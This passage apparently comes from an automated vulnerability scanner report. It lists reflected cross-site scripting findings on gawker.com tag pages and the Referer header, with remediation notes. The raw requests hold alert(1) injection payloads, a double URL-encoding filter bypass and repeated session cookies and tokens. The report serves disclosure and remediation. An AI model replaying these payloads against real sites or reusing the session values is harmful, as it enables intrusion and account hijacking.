GET /tag/votes85a29%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb5c37109db2/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
1.10. http://gawker.com/tag/votes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gawker.com
Path:
/tag/votes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3299"><script>alert(1)</script>6d164f3c031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/votes/?a3299"><script>alert(1)</script>6d164f3c031=1 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c83%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e84625f2a0 was submitted in the REST URL parameter 2. This input was echoed as c9c83"><script>alert(1)</script>3e84625f2a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/watchwhathappenslivec9c83%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e84625f2a0/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ab05"-alert(1)-"6abb26c5d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/watchwhathappenslive6ab05"-alert(1)-"6abb26c5d48/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
1.13. http://gawker.com/tag/watchwhathappenslive/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gawker.com
Path:
/tag/watchwhathappenslive/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e84"><script>alert(1)</script>f3c1657b543 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/watchwhathappenslive/?f5e84"><script>alert(1)</script>f3c1657b543=1 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1b2f"-alert(1)-"ac867017f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/wereadyoud1b2f"-alert(1)-"ac867017f1/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78349%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01372757270 was submitted in the REST URL parameter 2. This input was echoed as 78349"><script>alert(1)</script>01372757270 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/wereadyou78349%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e01372757270/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
1.16. http://gawker.com/tag/wereadyou/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gawker.com
Path:
/tag/wereadyou/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1df0f"><script>alert(1)</script>d3984e21e8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/wereadyou/?1df0f"><script>alert(1)</script>d3984e21e8e=1 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d04b"-alert(1)-"76a94490837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/whoopigoldberg9d04b"-alert(1)-"76a94490837/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4022f11f9b was submitted in the REST URL parameter 2. This input was echoed as 63b36"><script>alert(1)</script>f4022f11f9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/whoopigoldberg63b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef4022f11f9b/ HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
1.19. http://gawker.com/tag/whoopigoldberg/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gawker.com
Path:
/tag/whoopigoldberg/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe642"><script>alert(1)</script>50c1d52d831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/whoopigoldberg/?fe642"><script>alert(1)</script>50c1d52d831=1 HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%22a8794c8f8426b9d75e7b2351aa785f38%22%3Bs%3A4%3A%22time%22%3Bi%3A1292284759%3B%7D; ad_url_star=0; __qca=P0-1146686352-1292284716387; fbsetting_8001dd4a92a66481e53a7f86f983f413=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcf26"%3balert(1)//5266f32fbab was submitted in the Referer HTTP header. This input was echoed as bcf26";alert(1)//5266f32fbab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5710624/the-10-most-depressing-jobs-in-america HTTP/1.1 Host: gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ad_url_commenter=0; form_token=92efa9f292cde521dc1fa559e9366e5e; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHKSUM=deleted; __g_c=w%3A1%7Cb%3A2%7Cc%3A281937819272198%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_CHK=0ed632dab5c037a3470fae914b7b4ddc; GANJAVIEW=deleted; ad_url_login=0; NSC_hbxlfs-qppm=8efb34013660; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; SESSID_GANJA_2e9cca44efa10bf206dd4241f5d6f7cb_REVOL=deleted; __g_u=281937819272198_1_0.01_0_5_1292716706523; base_domain_8001dd4a92a66481e53a7f86f983f413=gawker.com; ad_url_visited_gawker_com=true; __utma=118630047.22565587.1292284719.1292284719.1292284719.1; __utmc=118630047; __utmb=118630047.1.10.1292284719; usrev=46078; __g_tut=1292284715355; __utmz=118630047.1292284719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __g_iut=1292284714684; SESSID_GANJA=2e9cca44efa10bf206dd4241f5d6f7cb; _chartbeat2=zhxmgrkso7xuxx1e; 